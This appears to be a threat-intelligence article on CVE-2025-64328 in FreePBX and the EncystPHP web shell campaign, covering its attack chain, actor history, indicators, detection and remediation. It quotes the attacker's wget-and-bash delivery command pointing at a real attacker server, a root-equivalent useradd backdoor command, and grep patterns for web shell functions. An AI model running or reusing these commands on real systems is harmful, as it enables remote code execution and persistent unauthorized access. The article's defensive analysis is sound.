CVE-2025-64328: How a Single FreePBX Bug Handed 900+ Phone Systems to Criminals

Your phone system is not just a communications tool. It is a Linux server sitting on your network, managing credentials, routing calls, connecting to your database, and — in many deployments — exposed to the internet with an administrative web interface. When that server runs vulnerable software and that interface is reachable, it is not a phone system anymore. It is a foothold.

That is exactly what happened to more than 900 organizations worldwide between December 2025 and late February 2026. A threat actor known as INJ3CTOR3 exploited CVE-2025-64328, a high-severity command injection flaw in Sangoma FreePBX's Endpoint Manager module, to deliver a sophisticated, self-preserving web shell called EncystPHP. The campaign was tracked by Fortinet's FortiGuard Labs, confirmed at scale by The Shadowserver Foundation, and ultimately earned a spot on CISA's Known Exploited Vulnerabilities (KEV) catalog — the federal government's formal acknowledgment that a vulnerability is being actively weaponized in the wild.

This article goes deep on the mechanics. We will look at what FreePBX is and why it matters as an attack surface, exactly what CVE-2025-64328 is and where it lives in the codebase, how EncystPHP was delivered and what it does step by step, the history and business model of INJ3CTOR3, and what the broader implications are for anyone responsible for securing communications infrastructure.

FreePBX as an Attack Surface: The Problem With Internet-Facing PBX

FreePBX is an open-source graphical user interface and administration framework built on top of Asterisk, the widely deployed open-source telephony engine. Sangoma Technologies maintains it and ships it as both standalone software and as part of their commercial PBX Appliance product line. It is used by small businesses, managed service providers, call centers, healthcare organizations, and schools — essentially any organization that wants to run its own phone system without paying enterprise telephony licensing fees.

The deployment model is important to understand. A standard FreePBX installation is a Linux box — typically CentOS or Alma Linux — running Asterisk as the core SIP/RTP engine, with FreePBX layered on top providing a PHP-based web interface for administrators. That web interface, the Administrator Control Panel (ACP), is what gets compromised in this campaign.

FreePBX's ACP is routinely exposed to the internet. This is not purely negligence — it is a practical reality of distributed management. When a Managed Service Provider (MSP) administers dozens of client PBX deployments, those clients' systems are geographically dispersed. The ACP must be reachable. The historical solution has been to either expose it directly or put it behind VPN — and not every operator chooses VPN.

The Endpoint Manager is a FreePBX module that handles provisioning and management of IP phone hardware. It lets administrators push firmware, configure phone models, set extension behavior, and connect the PBX to network storage via SSH and SFTP for file delivery to endpoints. That last function — the SSH connection testing feature — is precisely where CVE-2025-64328 lives.

Anatomy of CVE-2025-64328: The Injection Point

CVE-2025-64328 is classified as a post-authentication command injection vulnerability with a CVSS base score of 8.6 (HIGH). It affects the filestore module within the FreePBX Endpoint Manager's administrative interface, specifically versions 17.0.2.36 and above, up to but not including 17.0.3. The patch was released in version 17.0.3 and announced via FreePBX advisory in November 2025.

"The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host. An attacker could leverage this to obtain remote access to the system as the asterisk user." — FreePBX Security Advisory, November 2025

The vulnerable function is check_ssh_connect(), which is responsible for testing SSH connectivity from the FreePBX server to a configured remote file storage endpoint. The purpose is legitimate: when an administrator sets up a network share or SFTP location for endpoint firmware delivery, the interface provides a "Test Connection" button that invokes this function to verify credentials and reachability.

The underlying problem is that user-supplied input — specifically fields like the hostname, username, or password in the SSH connection form — is passed insufficiently sanitized into a shell command that gets executed server-side. This is the textbook definition of OS command injection (CWE-78). Rather than parameterizing or escaping the input before handing it to a system call, the function constructs a shell command string that incorporates attacker-controlled values. By injecting shell metacharacters such as semicolons, backticks, pipes, or dollar signs with subshell syntax, an attacker can break out of the intended command and execute arbitrary OS commands.

What makes this particularly dangerous is the execution context. Asterisk — and by extension FreePBX's web processes — typically runs as the asterisk user, a non-root but highly privileged service account with broad filesystem access to the telephony infrastructure. This is enough to read database credentials, write files to web-accessible directories, and interact with all the core components of the PBX. From that position, escalation to full root is achievable through various well-known techniques, which is exactly what EncystPHP does.

The CPE designation for the vulnerable component is cpe:2.3:a:sangoma:filestore:*:*:*:*:*:freepbx:*:* with versionStartIncluding: 17.0.2.36 and versionEndExcluding: 17.0.3. Proof-of-concept exploit code has been published publicly on GitHub, lowering the bar for exploitation significantly and enabling the kind of automated mass-scanning activity observed in this campaign.

A note on scoring: the 8.6 CVSS score cited throughout this article reflects the CVSSv4.0 rating used in the official Sangoma advisory and by CISA. Readers cross-referencing other databases may see a CVSSv3.1 score of 8.8 HIGH for the same flaw — a difference in scoring methodology, not severity. Both versions assess this as a high-severity vulnerability.

EncystPHP: Delivery and the Attack Chain

Fortinet's FortiGuard Labs, in their January 28, 2026 analysis authored by researcher Vincent Li, traced the attack chain in detail. The initial exploitation was observed originating from Brazil, targeting a victim environment managed by an Indian technology company providing cloud and communication services. This geographic pattern — origin in Brazil, victim in India — is consistent with the global footprint of INJ3CTOR3 infrastructure.

Upon successful exploitation of CVE-2025-64328, the attacker triggered an outbound connection from the compromised FreePBX server to a download server hosted at IP address 45.234.176.202. This IP resolves to the domain crm.razatelefonia.pro, which presents as a VoIP management system with a login interface — a convincing masquerade that could evade basic URL filtering based on domain reputation alone.

The download path used was /new/ on that server, which automatically redirects to a PHP dropper named k.php. The first-stage file downloaded by the victim server is named simply "c" — a shell script that serves as the EncystPHP dropper and orchestrates the entire compromise sequence. The delivery command, recovered from traffic analysis, was:

(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" \
  -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; \
  bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null &) 2>&1

The use of setsid creates a new session for the process, detaching it from the terminal and making it a session leader. This is a persistence and evasion technique — the process continues running even if the parent shell or SSH session is terminated. Combined with the output redirected to /dev/null, the attacker ensures the execution leaves no visible output trail.

The target directory, /var/spool/asterisk/tmp/, is the Asterisk temporary spool directory — a writable location that belongs to the Asterisk service. Writing here is expected behavior for a legitimate PBX process, which means file creation in this path is less likely to trigger anomaly detection rules compared to writing to /tmp or a web root directly.

Inside EncystPHP: A Six-Stage Compromise

EncystPHP is not a simple web shell. It is a multi-stage attack framework delivered as PHP and shell components that work together to achieve persistent, privileged, covert control over the compromised host. The name "EncystPHP" reflects its design philosophy — like a biological cyst, it encapsulates itself, protects its core, and is difficult to remove without understanding its full structure. The execution chain follows a logical sequence:

Stage 1: Lock Down Legitimate Files

The dropper's first action is to modify the file permissions of two legitimate FreePBX PHP files — ajax.php and model.php — to 000. This renders them completely unreadable, unwritable, and non-executable by any user or process, including root by default (though root can override this). The attacker does this not to destroy functionality but to force the web server to reload them from attacker-controlled versions, and to ensure that monitoring tools checking these files for modification will find them inaccessible rather than tampered — a subtle evasion.

Stage 2: Harvest Credentials

EncystPHP reads /etc/freepbx.conf, the main FreePBX configuration file, which contains database connection credentials including the MySQL username and password used by FreePBX to access its backend database. Exfiltrating these credentials gives the attacker access to all extensions, voicemail accounts, call routing rules, SIP credentials, and potentially integrations with other systems stored in the FreePBX database.

Stage 3: Eliminate Competition and Prior Backdoors

This stage reveals operational sophistication. EncystPHP actively hunts for and deletes other web shells on the compromised system. It scans PHP files for telltale patterns of other shells — Base64 decode functions, packet header manipulation, shell_exec and system() calls — and removes them. It also specifically targets files containing strings like "Badr," "b3d0r," "pastebin," "yokyok," or a specific Base64 token associated with a different malicious actor. This is competitive territory-claiming behavior: INJ3CTOR3 does not want to share access with other threat actors on the same machine.

The malware also deletes cron job entries and a specific list of FreePBX user accounts from the database, including: ampuser, svc_freepbx, freepbx_svc, bluej, nahda, FreePBX_setup, emoadmin, and nvd0rz. The presence of names like "nahda," "bluej," and "b3d0r" in the removal lists suggests these are identifiers associated with competing access brokers or other INJ3CTOR3 operators who may have previously compromised the same systems.

Stage 4: Create Root-Level Persistent Access

EncystPHP creates a new root-level system user named newfpbx using the following command, recovered from the dropper analysis:

useradd -s /bin/bash -ou 0 -g 0 \
  -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null

The -ou 0 -g 0 flags assign UID 0 and GID 0, making this user a root equivalent regardless of the username. The password is hardcoded as an MD5-crypt hash — verifiable and consistent across all compromised systems. The attacker also resets multiple existing user account passwords to a single shared value, creating lateral access points throughout the system's user database.

Beyond the local user account, EncystPHP injects an attacker-controlled SSH public key into the authorized_keys file and modifies SSH daemon configuration to ensure port 22 remains open and accessible. These mechanisms provide SSH-level root access that survives web shell removal — meaning an administrator who finds and deletes the PHP files but does not audit SSH keys and system accounts is still completely compromised.

Stage 5: Download Secondary Dropper and Establish Multi-Path Persistence

The "c" dropper fetches a secondary PHP dropper, k.php, which performs a parallel set of persistence actions including deploying its own Base64-encoded web shell. EncystPHP's architecture deliberately uses multiple independent persistence mechanisms so that removing any single artifact does not restore security. FortiGuard Labs documented web shell instances deployed to at least twelve different file paths across the FreePBX web root structure, ensuring alternative access routes remain even if incident responders find some of them.

The shell also installs cron jobs that periodically re-fetch the secondary dropper from the command infrastructure, meaning even if all local artifacts are cleaned, the cron job will re-infect the system the next time it executes — unless it too is explicitly removed.

Stage 6: Clean Evidence and Restore Appearances

In the final stage, EncystPHP demonstrates the kind of operational security awareness that distinguishes professional criminal tooling from amateur malware. It tampers with system and application log files to erase evidence of the initial exploitation and dropper execution. It removes the FreePBX Endpoint Manager module — the very module that contained the exploited vulnerability — which simultaneously eliminates the attack vector for future exploitation by other actors and removes forensic artifacts from the module's own audit logs. Finally, it restores file permissions on FreePBX-related PHP files to their normal values and triggers a FreePBX configuration reload, so that the system appears to function normally. No service outage, no alarm bells, no degradation of call quality — the organization continues using their phone system while the attacker has full control.

FortiGuard Labs' analysis also documents that EncystPHP forges file timestamps on its deployed web shells to match the modification times of legitimate FreePBX files in the same directories. This timestamp manipulation directly counters forensic triage workflows that sort by recently modified files — a common first step when an administrator suspects compromise. A web shell planted in /var/www/html/admin/views/ with a timestamp matching surrounding legitimate files will not stand out in a directory listing, and will be skipped by time-based filesystem audits that only look back a few days. Only hash-based or behavior-based detection will catch it. This detail underscores how carefully EncystPHP has been engineered against realistic incident response procedures — not just against automated security tooling.

INJ3CTOR3: A Six-Year History of VoIP Exploitation

To understand why this campaign is so effective, you need to understand who is running it. INJ3CTOR3 is not a new actor. They were first publicly identified and named by Check Point Research in 2020, in a report by researchers Ido Solomon, Ori Hamama, and Omer Ventura. At that time, the group was exploiting CVE-2019-19006, an authentication bypass in FreePBX, to compromise Asterisk-based PBX systems globally.

"The group's main purpose is to sell phone numbers, call plans, and live access to VoIP services compromised as part of the INJ3CTOR attacks." — Check Point Research, 2020

Check Point's analysis revealed that INJ3CTOR3 operated within a broader ecosystem of VoIP fraud, connecting to Facebook groups primarily populated by members from Gaza, the West Bank, and Egypt. These communities traded tools, credentials, access to compromised SIP servers, and knowledge of International Premium Rate Number (IPRN) schemes. The business model is straightforward: compromise a PBX, use it to generate outbound calls to premium-rate numbers that the attacker controls or has an arrangement with, and collect the per-minute revenue before the victim notices unexplained call charges.

In 2022, the group evolved. Rather than continuing to exploit the by-then widely patched CVE-2019-19006, they shifted targeting to systems running the Elastix unified communications platform — a FreePBX-based distribution that had its open-source development discontinued following its acquisition by 3CX in 2016 — via CVE-2021-45461, a remote code execution vulnerability in the Rest Phone Apps (restapps) module used in Digium phones with Elastix and FreePBX. The 2022 campaign was analyzed in depth by Palo Alto Networks Unit 42, whose July 2022 report documented over 500,000 unique malware samples from this family deployed between late December 2021 and the end of March 2022 alone. The pattern was identical: find a vulnerable, internet-facing VoIP system, exploit the administration interface, deploy a web shell, and monetize the telephony access.

The 2025-2026 campaign represents the group's third major pivot to a new CVE, this time CVE-2025-64328 in modern FreePBX 17.x. The consistency is striking: six years, three CVEs, the same fundamental target category (VoIP administrative interfaces), the same monetization approach, and an increasingly sophisticated toolset. EncystPHP represents a meaningful capability upgrade over the simpler web shells used in earlier campaigns.

The attack infrastructure also carries fingerprints. The dropper server domain, crm.razatelefonia.pro, uses "telefonia" — the Spanish and Portuguese word for telephony — as a domain component, consistent with Brazilian-origin infrastructure documented by Fortinet. Strings like "Badr," "b3d0r," and the calling card "inje3t0r3-seraj" appearing in the malware's own removal logic and in previous exploits suggest a small, consistent team with recognizable identifiers that span multiple years of activity.

The Scale: 900+ Compromises and What They Mean

The Shadowserver Foundation, a non-profit that operates global internet scanning and threat intelligence infrastructure, confirmed in late February 2026 that over 900 FreePBX instances remain actively compromised and running web shells. The geographic breakdown, as reported to The Hacker News and Security Affairs, is worth examining closely:

• United States: ~401 compromised hosts — by far the largest concentration, reflecting both the size of the US FreePBX deployment base and the number of instances with internet-exposed ACPs
• Brazil: 51
• Canada: 43
• Germany: 40
• France: 36
• United Kingdom, Italy, Netherlands: dozens each
• Smaller numbers spread across dozens of other countries

These 900+ represent systems that are still actively running web shells as of the reporting date. They are not historical infections that have been cleaned. The actual total number of systems compromised since December 2025 is likely higher, as some organizations may have already remediated while others may not yet have been scanned by Shadowserver's infrastructure.

Consider what 900 compromised PBX systems means in practical terms. Each system routes calls for an organization — a business, a school, a medical office, a government agency. Each system has a database of SIP credentials that can be extracted and resold. Each system has a network position that can serve as a pivot point for attacks against the broader network. And each system is actively generating unauthorized outbound calls, charging those call costs back to the victim organization while the revenue flows to INJ3CTOR3.

CISA KEV Designation: What It Means in Practice

In early February 2026, CISA added CVE-2025-64328 to its Known Exploited Vulnerabilities (KEV) catalog. This designation is significant for several reasons beyond its symbolic weight. Federal agencies under the authority of Binding Operational Directive 22-01 are legally required to remediate KEV catalog vulnerabilities within specified timeframes. For contractors and vendors working with the federal government, KEV designation often triggers contractual obligations to patch.

More broadly, KEV designation is a signal to every security team. CISA does not add theoretical vulnerabilities to the KEV catalog. Every entry represents a vulnerability that has been confirmed as actively and meaningfully exploited against real targets. When CISA says a vulnerability is being exploited, they mean it, and the FreePBX advisory from November 2025 had already gone largely unheeded by the time the KEV designation was issued in February 2026 — a two-month window during which attackers compromised hundreds of systems.

The gap between vulnerability disclosure (November 2025) and KEV designation (February 2026) illustrates a recurring problem in enterprise patch management. Security advisories for infrastructure components like PBX systems frequently receive lower prioritization than operating system or endpoint patches. The assumption — sometimes unconscious — is that a phone system is a low-risk peripheral. This campaign demonstrates exactly how wrong that assumption is.

The Monetization Layer: International Toll Fraud and Why VoIP Is Lucrative

To fully grasp why INJ3CTOR3 has invested six years in this category of attack, it helps to understand the economics of toll fraud. An International Premium Rate Number (IPRN) operates on a revenue-sharing model: a number in a premium-rate range (often in countries like Latvia, Gambia, Somalia, Guyana, or various Pacific Island nations) generates per-minute charges for every call made to it. The revenue flows to whoever controls the number's termination — which can be arranged without owning telecom infrastructure, through IPRN brokers who operate in gray or outright illegal markets.

A compromised PBX with 100 active SIP trunks can generate enormous call volume in a short period. An attacker who configures the compromised Asterisk instance to dial an IPRN and leave calls connected for hours can generate thousands of dollars in fraudulent charges before the victim's telecom provider or the organization itself notices the anomalous billing. Multiply this across 900 compromised systems and the scale of potential revenue becomes clear.

Fortinet FortiGuard Labs, January 2026: The web shell leverages Elastix and FreePBX administrative contexts to operate with elevated privileges, enabling arbitrary command execution and outbound call activity through the compromised PBX environment.

EncystPHP's "Ask Master" interface includes predefined commands to list active Asterisk channels and enumerate SIP peers — precisely the reconnaissance needed to understand how to route fraudulent calls most effectively through the compromised infrastructure. The web shell is not just about system access; it is purpose-built for telephony monetization.

MITRE ATT&CK Technique Mapping

The EncystPHP campaign maps cleanly across multiple phases of the MITRE ATT&CK Enterprise framework. Understanding these mappings is useful both for threat hunting and for assessing whether your detection coverage addresses this attacker's methods:

• T1190 — Exploit Public-Facing Application: Initial access via CVE-2025-64328 in the internet-exposed FreePBX Administrator Control Panel.
• T1059.004 — Command and Scripting Interpreter: Unix Shell: Exploitation delivers a shell command through the injected check_ssh_connect() function, and the dropper script "c" is a bash shell script executed on the victim host.
• T1505.003 — Server Software Component: Web Shell: EncystPHP itself. Deployed to at least twelve file paths across the web root, masquerading as ajax.php.
• T1136.001 — Create Account: Local Account: Creation of the newfpbx user with UID 0 (root equivalent).
• T1098.004 — Account Manipulation: SSH Authorized Keys: Injection of the attacker's SSH public key into authorized_keys and modification of SSH daemon configuration to maintain port 22 access.
• T1053.003 — Scheduled Task/Job: Cron: Cron jobs that periodically re-fetch the secondary dropper from attacker infrastructure, enabling re-infection after partial cleanup.
• T1003 — OS Credential Dumping: Exfiltration of /etc/freepbx.conf to obtain MySQL credentials and SIP account data.
• T1070.006 — Indicator Removal: Timestomp: Forging of file timestamps on deployed web shells to match legitimate files in the same directories, defeating time-based forensic triage.
• T1070.002 — Indicator Removal: Clear Linux or Mac System Logs: Tampering with system and application logs to remove evidence of initial exploitation.
• T1083 — File and Directory Discovery: The "Ask Master" interface includes predefined commands for filesystem enumeration and configuration file retrieval.
• T1499 — Endpoint Denial of Service / T1496 — Resource Hijacking: Unauthorized outbound call generation through the compromised Asterisk instance for toll fraud monetization.

The breadth of ATT&CK coverage in a single campaign is notable. EncystPHP is not a smash-and-grab exploit — it is a full attack lifecycle compressed into a single automated dropper, touching initial access, execution, persistence, privilege escalation, credential access, defense evasion, and impact. An organization whose detection coverage has gaps in any of these phases may observe only part of the chain, giving a false impression of limited compromise.

Detection: Finding EncystPHP on a Compromised System

If you are responsible for a FreePBX 17.x deployment, particularly one running any version between 17.0.2.36 and 17.0.3, a thorough compromise assessment requires checking beyond just the patch version. EncystPHP's multi-path persistence means a patched system can still be fully backdoored.

The primary indicators to look for, based on FortiGuard Labs' analysis and published IOCs, include:

• The presence of ajax.php in /var/www/html/admin/views/ with unexpected content or permissions set to 000 on legitimate files in that directory
• Any PHP file containing the string "Ask Master" or MD5 authentication comparisons against hardcoded hashes
• PHP files whose timestamps match surrounding legitimate files but whose content or hash does not match a clean FreePBX installation — EncystPHP forges timestamps specifically to defeat time-based triage
• A system user named newfpbx with UID 0 (root equivalent)
• SSH authorized keys containing entries not placed by your administration team
• Cron jobs referencing /var/spool/asterisk/tmp/ or making outbound connections to 45.234.176.202 or crm.razatelefonia.pro
• Missing or corrupted /etc/freepbx.conf
• Absence of the FreePBX Endpoint Manager module (the attacker removes it)
• Suspicious outbound call activity, particularly to obscure international destinations or premium-rate number ranges

A quick filesystem audit targeting likely web shell locations can be performed with:

# Search for suspicious PHP files in the web root
find /var/www/html -name "*.php" -newer /etc/hosts \
  -exec grep -l "base64_decode\|shell_exec\|system\|passthru" {} \;

# Hash-based check for known EncystPHP strings (timestamp forgery defeats mtime checks)
grep -rl "Ask Master\|base64_decode.*eval\|shell_exec\|passthru" \
  /var/www/html/admin/ 2>/dev/null

# Check for unexpected UID 0 users
awk -F: '($3 == 0) {print}' /etc/passwd

# Audit crontabs for all users
for user in $(cut -f1 -d: /etc/passwd); do
  crontab -l -u $user 2>/dev/null | grep -v "^#" | \
  grep . && echo "  ^ user: $user"
done

# Check authorized_keys for all users
find /home /root -name "authorized_keys" -exec cat {} \;

Remediation: What Full Recovery Actually Requires

The minimum required action is updating the filestore module to version 17.0.3 or later. But for systems that were vulnerable during the exploitation window (December 2025 onward), the remediation checklist is substantially longer:

1. Isolate the affected PBX server from the network before beginning forensics. A live compromised system with active cron-based re-infection will undo cleanup work.
2. Update to FreePBX 17.0.3 or later via the Module Admin interface to close the CVE-2025-64328 attack vector.
3. Audit all filesystem artifacts. Check the twelve-plus file paths where EncystPHP deploys web shells. Do not limit the search to known paths — use hash and behavior-based scanning.
4. Remove all unauthorized cron jobs. Check system-level crontabs (/etc/cron.d/, /var/spool/cron/) as well as user-level crontabs for the asterisk, apache/httpd, and root users.
5. Purge all unauthorized user accounts, specifically newfpbx and any other UID 0 accounts created by the malware.
6. Rotate all credentials. This includes FreePBX admin passwords, database credentials (MySQL), SIP account passwords, and any external service integrations. EncystPHP harvested /etc/freepbx.conf — assume those credentials are compromised.
7. Audit and clean SSH authorized_keys on all user accounts.
8. Review call logs for anomalous outbound activity, particularly to premium-rate international destinations. Contact your SIP provider if suspicious traffic is found.
9. Restrict ACP access post-remediation to specific trusted IP ranges or behind a VPN. The ACP should not be internet-accessible without strong controls.
10. Enable multi-factor authentication on all administrative accounts.

The Deeper Lesson: Infrastructure Blind Spots and the Security Debt Model

CVE-2025-64328 and the EncystPHP campaign are not anomalies. They are the predictable output of a structural problem in how organizations think about — and budget for — security across their technology stack.

Enterprise security programs have matured significantly around endpoints, email, and cloud infrastructure. Endpoint Detection and Response (EDR), email filtering, SIEM integration, and zero-trust network architecture are well-understood and widely deployed. But the infrastructure layer — the systems that run telephony, physical access control, building automation, industrial control, and similar operational technology — remains largely outside the standard security umbrella.

PBX systems are rarely included in vulnerability scanning programs. They are rarely covered by EDR solutions. Their logs rarely feed into SIEM. They are often managed by a telecommunications team rather than the security team, creating ownership gaps. And when vendors publish security advisories for them, those advisories frequently sit unread in inboxes that security staff do not monitor.

INJ3CTOR3 understands this better than many security teams. They have been exploiting precisely this gap for six years, pivoting from CVE to CVE as each is patched, maintaining consistent access to a category of target that provides reliable monetization with low detection risk. The sophistication of EncystPHP — its competitive removal of rival web shells, its multi-path persistence, its evidence tampering, its functional masquerade as a legitimate file — reflects an attacker who has learned from operational experience exactly what defenders do and do not check.

The fact that 400 of the 900+ compromised systems are located in the United States, a country with among the most mature enterprise security programs in the world, suggests that even well-resourced organizations are leaving VoIP infrastructure in a de facto unmonitored state. This is a security debt problem. Every quarter that a FreePBX system runs without being included in vulnerability scanning, without its logs reviewed, without its administrative access hardened, is a quarter of accumulated risk waiting for the next CVE announcement.

The post-authentication classification of this vulnerability invites one more difficult question: how did attackers obtain valid credentials for so many FreePBX administrative interfaces? Some were likely default credentials that were never changed. Some were probably obtained through credential stuffing attacks using lists compiled from other breaches. Some may have come from phishing. And some — given INJ3CTOR3's known participation in underground markets — were almost certainly purchased. The underground economy for VoIP access credentials is well-established. Securing the login form is not sufficient if the credentials themselves are available for purchase.

Key Takeaways

1. VoIP and PBX systems are not peripheral devices — they are full Linux servers: They deserve the same vulnerability management, log monitoring, and access controls applied to any other server in your environment. Treat FreePBX, Asterisk, and similar systems as first-class assets in your security program.
2. Post-authentication does not mean low-risk: CVE-2025-64328 required a valid login, which attackers obtained at scale across 900+ targets. Default credential hygiene, MFA, and access restriction to the administrative panel are non-optional controls for internet-facing PBX management interfaces.
3. EncystPHP survives patching: Systems compromised before patching require full incident response. SSH keys, user accounts, cron jobs, and database credentials must all be audited and rotated. Patching closes the entry point; it does not evict the attacker already inside.
4. INJ3CTOR3 is persistent and adaptive: Three CVEs, six years, an evolving toolset, and a clear monetization model. Organizations that depend on VoIP infrastructure for revenue-generating operations — call centers, healthcare, financial services, legal — should assess their exposure to this actor class specifically.
5. CISA KEV designation means exploitation is real and ongoing: When a vulnerability enters the KEV catalog, the remediation clock is running. For organizations operating under federal compliance frameworks, this is a legal obligation. For everyone else, it is a strong signal that theoretical risk has become operational reality. FreePBX now has multiple entries in the KEV catalog — CVE-2025-57819 (added August 2025, pre-authentication, CVSS 10.0) and CVE-2025-64328 (added February 2026, post-authentication, CVSS 8.6) — meaning this platform has been under continuous active exploitation for most of the past year. Treat it accordingly.

There is a certain uncomfortable irony in the fact that a phone system — a technology whose entire purpose is enabling human communication — became a vector for silent, long-running criminal activity that its operators never heard or saw. The organizations whose PBX systems were compromised by EncystPHP continued making and receiving calls. Business continued. And somewhere, EncystPHP's "Ask Master" interface was waiting patiently for its next instruction, running as root, with full knowledge of every extension, every credential, and every call that passed through a system the attacker now owned more completely than the organization that was paying the bill.

The controls exist. The patches are available. The detection methods are documented. What remains is the harder organizational work: expanding the security perimeter in the minds of leadership and in the budgets of IT departments to include the infrastructure that everyone uses but almost nobody audits.